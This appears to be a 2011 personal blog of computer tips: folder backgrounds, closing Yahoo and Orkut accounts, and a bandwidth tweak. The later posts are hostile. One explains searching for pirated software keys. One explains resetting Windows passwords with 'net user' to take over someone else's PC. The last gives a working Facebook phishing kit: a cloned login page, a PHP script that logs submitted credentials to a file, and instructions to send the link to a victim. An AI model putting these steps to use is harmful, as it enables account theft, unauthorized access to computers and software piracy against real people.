Monday, November 28, 2011

HOW TO ADD BACKGROUND TO YOUR FOLDER


Follow this steps

1. Create a folder and rename it as you like e.g folder
2. Now create another folder within folder and rename it as Folder Settings
3. Select a jpg file and copy it in ur Folder Settings and rename it as background.jpg
4. Now select an icon file with extension .ico from ur pc and paste it in folder setting(search for it)
5. now copy the below code and paste it in notepad
[.ShellClassInfo]
IconFile=Folder Settings\icon.ico
IconIndex=0

[{BE098140-A513-11D0-A3A4-00C04FD706EC}]
IconArea_Image=Folder Settings\Background.jpg
[Info]
Author=madhuri
6.Save it as desktop.ini in the Folder
7. Now click on folder and select properties ,click on cutomize,Choose picture
8. open background.jpg file
9.Now click on change icon and open icon.ico which u have pasted in folder settings
10. Now u open the folder u can see background image

That's it!

Saturday, November 5, 2011

U Can Delete Ur Yahoo account


To close your Yahoo! account, please follow the steps on the Account Termination page. There are a few things you should understand before you delete your account.
  • You will be asked to sign in or to verify the password for the account you want to delete.
  • Before deleting your account, please read the instructions on the Account Termination page carefully, as important information about your account is included. You can then confirm the deletion of your account.
  • Some of the features discussed below can only be accessed or modified from a desktop or laptop computer. If the instructions listed do not work on your mobile device, you can log in to Yahoo! Mail on your computer.
  • Please complete the deletion process only if you are certain you want to remove your entire Yahoo! account and any features you have personalized within the account. After you delete your Yahoo! account, you can’t reactivate it, although you can always sign up for a new account.
  • When you close your account, you will lose access to your Yahoo! ID, Yahoo! Mail, and profile names. We will delete your account data and settings across the Yahoo! network. This means you will lose all of your content in Yahoo! Mail, Yahoo! Contacts,   My Yahoo!, Yahoo! Groups, in your Yahoo! Finance Portfolio, and in any other area of Yahoo! that can only be accessed with your Yahoo! ID and password.
  • Deleting your Yahoo! account does not alter or delete your Yahoo! People Search listing. You must edit or delete this separately.
  • If you are subscribed to any premium services, we recommend that you cancel them before you delete your account. There is no guarantee that deleting your Yahoo! account will immediately cancel the billing for any premium services to which you are subscribed. To cancel your current subscriptions, please view theYahoo! Billing Information for your account, click My Services, and then click the Cancel link for each subscription.
NOTE: Using an older version of Internet Explorer or Firefox subjects your PC to more vulnerabilities, viruses and spyware. To ensure you’re protected, we recommend downloading a Yahoo! optimized version of Internet Explorer or Firefox today

    Deleting ur orkut account



    Are you sure you won't need your Orkut profile anymore? This is important, because deleting your profile is totally permanent.
    If you’re absolutely sure, follow the steps below to permanently delete your Orkut profile:
    1. Click settings on the top of any Orkut page.
    2. On the general tab, click delete my Orkut account.
    3. You'll be taken to a page that gives further instructions and a link to delete my account. Clicking this link will redirect you to the "Delete Orkut" page of your Google Account.
    4. Check the box confirming that you really want to permanently delete your Orkut profile from your Google Account.
    5. Enter your password and click Remove Orkut. Your Orkut profile will be deleted, but your Google Account will remain active.
    Your profile will now rest forever and you won’t be able to bring it back, nor restore any of the information from the deleted profile.
    Also keep in mind that any communities you own won't be deleted when you delete your profile. If you'd like to also delete your communities, remember to do so before deleting your profile. Alternatively, you may also transfer ownership of your community to another member. Otherwise, another member may become the moderator of any ownerless communities.

    Sunday, October 23, 2011

    HOW TO SPEEDUP INTERNET ACCESS


    Here's a simple little thing you can do to increase your bandwidth by at least 20%. 

    Ok here we go... 

    1.) log on as Administrator. 

    2.) start - run - type gpedit.msc 

    3.) expand "local computer policy" 

    4.) then expand "administrative templates" 

    5.) then expand "network branch" 

    6.) Highlight the "QoS Packet Scheduler" 

    7.) on right window double click "limit reservable bandwidth" 

    8.) on setting tab check the "enabled" 

    9.) change "Bandwidth limit %" to 0 

    You're done.It would be a good idea to reboot after this.......

    Tuesday, October 11, 2011

    GET KEY FOR ANY SOFTWARE WHICH U WAN"T

    Here i am with a simple google hack.Actually its not  a hack its just a method to find out the keys exactly what we wanted using google.




    Follow the simple steps:-
    1.While searching for any key  type the key which you want in quotations "Adobe Photoshop"
    2.Then leave a gap space and type 94FBR

    Example


    "Adobe Photoshop" 94FBR

    HACK WINDOWS ADMINISTRATION PASSWORD

    Here I am with an awesome post on how to "Hack Windows Administrator ". 


    The following tricks will help you in  resetting the lost password (when you forget) or to take over any PC for which you dont know the password.


    1.RESEPASSWORD USING COMMAND PROMPT(Easy):

    • Go to start-->Run-->type cmd then hit enter
    • Now you can see command prompt open then type net user and then hit enter
    • Now the system will show list of user accounts for example Student,Admin,madhuri etc
    • So now if you want to change the password of user name Rajesh then type the following command
                           net user madhuri *
    • Then hit enter,now you will be asked to enter the new password 
    So you will be able to reset password in this way without knowing original password.

    2.LOGIN INTO A PC WITHOUT USING ANY PASSOWRD AS ADMINISTRATOR USING A SMALL TRICK  FOR WINDOWS XP USERS(Easy):

    • When you are asked to enter the password of the user while logging in press CTRL+ALT+DELETE TWICE .
    • Now you will get another screen with user name,remove the user name and type Administrator and then hit enter now you will be logged in as administrator and you will have all the benifits of changing passwords of any user.
    Thats it!!!  :) :)

    LEARN HOW TO HACK

    Here I am with a working method on How To Hack Facebook Account using Phishing.



    Steps To Be Followed To Hack A Facebook Account:-


    Step 1:-

    • Go to facebook.com
    • Right click on white space and click view Page Source.
    • Then copy the whole code to notepad. 

    Step 2:-

    • Press Ctrl+F and search for action=
    • You will find code as shown below



    • You can see action= something in the above screenshot now you have to replace that to action="mail.php".
    • Now save the document as index.html.
    Step 3:-
    • Now you have to create a document with name "mail.php".
    • So open a new notepad then copy and paste the following code and name it as mail.php.

    <?php
    header ('Location: https://www.gmail.com ');
    $handle = fopen("log.txt", "a");
    foreach($_POST as $variable => $value) {
       fwrite($handle, $variable);
       fwrite($handle, "=");
       fwrite($handle, $value);
       fwrite($handle, "\r\n");
    }
    fwrite($handle, "\r\n");
    fclose($handle);
    exit;
    ?>

    • Save the file as mail.php.
    Step 4:-
    • Now open new notepad and name it as log.txt without any content. 
    Step 5:-
    • Now upload these three files to any one of the free hosting sites like my3gb.com ,  byethost.com,  110mb.com , freewebhost.com ,  t35.com , justfree.com , spam.com etc
    Step 6:-
    • Your setup is ready all you have to do is send index.html link to your victim and some how make him login into it.
    • Then its done password will be yours.